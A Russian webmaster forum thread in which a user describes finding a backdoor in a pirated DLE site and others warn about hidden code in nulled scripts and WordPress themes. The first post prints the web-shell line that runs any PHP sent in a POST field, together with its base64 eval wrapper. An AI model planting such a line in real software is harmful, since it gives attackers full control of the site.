О вреде нулёных движков (DLE и подобные)

(Ответов: 36, Просмотров: 5190)
Страница 1 из 4 123 Последняя
  1. Banned
    • Регистрация: 08.09.2009
    • Сообщений: 1,478
    • Репутация: 80
    • Webmoney BL: ?
    Всё началось с того, что меня попросили посмотреть сайт, у которого глючило gzip сжатие. Через некоторое время я выяснил, что в уже сжатый код дописываеться какой то html код. Стало ясно, что на сайте кто то или что то очень грубо вставляет свой код. Движок сайта - DLE. Как потом выяснилось пиратская копия.

    Сам код выглядил как подключение javascrip со стороннего домена. На этот скрипт ругался антивирь и стало ясно, что сайт заражён.

    Я скачал весь сайт на винт, прошёлся по ним поиском по файлам. Оказалось во всех шаблонах подключался это js. Я всё почистил, залил обратно. Все пароли мы сменили, владелец проверился на вирусы.

    Однако через некоторое время вновь все файлы с шаблонами были модифицированы. Тогда я уже полез в исходники и обнаружил стандартную структур бекдора:

    PHP код:
    eval(base64_encode("...тут зашифрованый код....")); 
    Для не понимающих в php эта конструкция позволяет выполнить код зашифрованный алгоритмом base64 (типа такого DSdffsdSDF4f4ff5hcfxcvt6G4ffs). При расшифровке я увидел опять же самый галимый код использемый для простого получения контроля над сайтом

    PHP код:
    if ($_POST['code']) eval($_POST['code']); 
    Эта конструкция позволяет выполнить любой php код отправленный из простой формы с любого другого сайта. Т.е. злоумышленник спокойно получает доступ к вашему сайту.

    Владелец сообщил, что он установил DLE скачав с какого то левого сайта, т.к. официальный дистрибутив требует лицензию.

    Вот и попались на халяве, господа. А ведь почти половина ломаных скриптов имеет в себе "сюрпризы". Пользуйтесь только официальными дистрибутивами, скачанными с оф. сайта. Если нет денег на лицензию, используйте бесплатные движки. Не надо искать халявы, ибо на халявщиках потом наживаются производители халявы.

    PS: За время пока на сайте жил скрипт, яндекс уже успел занести его в разряд "могут нанести вред вашему компьютеру"
    Последний раз редактировалось noxon.su; 12.12.2009 в 18:45.
    • 3

    Спасибо сказали:

    dimok(12.12.2009), grazer(12.12.2009), webarter(12.12.2009),
  2. Гуру Аватар для dimok
    • Регистрация: 10.08.2009
    • Сообщений: 1,605
    • Репутация: 143
    • Webmoney BL: ?
    все верно. в погоне за халявой можно сильно попортить себе нервы в будущем.
    Ротабан - баннерная реклама
    Ротапост - платные посты и постовые
    • 0
  3. Super Moderator Аватар для grazer
    • Регистрация: 03.09.2009
    • Сообщений: 5,200
    • Записей в дневнике: 83
    • Репутация: 2378
    • Webmoney BL: ?
    noxon.su, спаписбо за совет, всем на это нужно обратить внимание. Так что лучше заплатить и купить лицензию, чем пользоваться всякими бесплатными вариантами, из-за которых можно лишиться гораздо больших денег, усилий и нервов.
    Домены, хостинг и VPS 10 лет доверяю REG.RU. Проблем нет.
    Найти меня можно в телеграме, подписывайтесь (cнг/бурж seo).
    • 0
  4. Гуру Аватар для 24110
    • Регистрация: 07.09.2009
    • Сообщений: 1,649
    • Репутация: 91
    А занести заразу прямо на серваке не могли? А то лом так обычно и шифруют.
    Парам-пам-пам!
    • 0
  5. Опытный Аватар для stArik
    • Регистрация: 11.05.2009
    • Сообщений: 439
    • Репутация: 38
    Более того, постоянно встречаю нклуд стороннего кода в шаблонах и плагинах от wordpress. Советую всем перед установкой последних проверить все файлы на наличие eval(base64_encode
    • 0
  6. Гуру
    • Регистрация: 08.09.2009
    • Сообщений: 1,981
    • Записей в дневнике: 4
    • Репутация: 193
    когда есть вредоносный JS то это действительно ***** (

    когда-то встречал в нуленой вобле в футере около 10 скрытых ссылок. так и не нашел где этот код выводился в шаблоне, пришлось менять весь дистрибутив и заново подключать к базе.

    Так что после заливки сайта воспользуйтесь тулзами, которые показывают сколько внешних ссылок с сайта стоит
    • 0
  7. Гуру Аватар для Inquisitor
    • Регистрация: 29.04.2009
    • Сообщений: 769
    • Репутация: 144
    Цитата Сообщение от stArik Посмотреть сообщение
    Более того, постоянно встречаю нклуд стороннего кода в шаблонах и плагинах от wordpress. Советую всем перед установкой последних проверить все файлы на наличие eval(base64_encode
    Так таким же образом кодирует свои ссылки в футере. А что то я не встречал никогда.
    • 0
  8. Гуру
    • Регистрация: 08.09.2009
    • Сообщений: 1,981
    • Записей в дневнике: 4
    • Репутация: 193
    Так таким же образом кодирует свои ссылки в футере. А что то я не встречал никогда.
    да в каждом втором бесплатном шаблоне для WP есть кодированный код со ссылками. (смотря где качать конечно) Часто помимо самих ссылок кодируют еще и часть шаблона, так что после удаления этой php вставки в браузере едет сайт... Опытному верстальщику это исправить как 2 пальца обо.. а вот другим приходитсья мирится или брать другой шаблон.
    • 0
  9. Banned
    • Регистрация: 04.11.2009
    • Сообщений: 263
    • Репутация: 55
    mall, да вот не скажи, я совсем неопытный верстальщик, но вырезать структуру "eval(base64_encode(" и вставить её в строку поиска яндекса как-то додумался
    Сразу-же нашлось очень много онлайн-декодеров, единственной проблемой была моя мысль что вставлять нужно зашифрованый код, а структуру перед ним нет, потому психовал пол часа, потом вставил и всё нормально было :)
    Ещё Леднёв писал в своём блоге что можно вместо base64 какой-то другой оператор и всё само раскодируется и будет нормально отображатся.
    Так что и для "не верстальщика" разобратся с этим кодированием тем тоже просто)
    Другое дело - когда в новых шаблонах всё настолько накручено в сайдбаре например, что просто понять не можешь где и что находится, для этого нужно знать php
    • 0
  10. Гуру Аватар для EvilGomel
    • Регистрация: 03.09.2009
    • Сообщений: 1,178
    • Репутация: 84
    • Webmoney BL: ?
    Надо брать проверенные нуллы.
    • 2
Страница 1 из 4 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Коллективные блоги. Обзор движков
Блоги 21 06.03.2011 18:29
Бонусность движков используемых для сдл
Блоги 72 18.12.2009 13:50
Установка движков, форумов, модов - профессионально и недорого
Реклама партнерских программ 5 03.09.2009 23:42

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры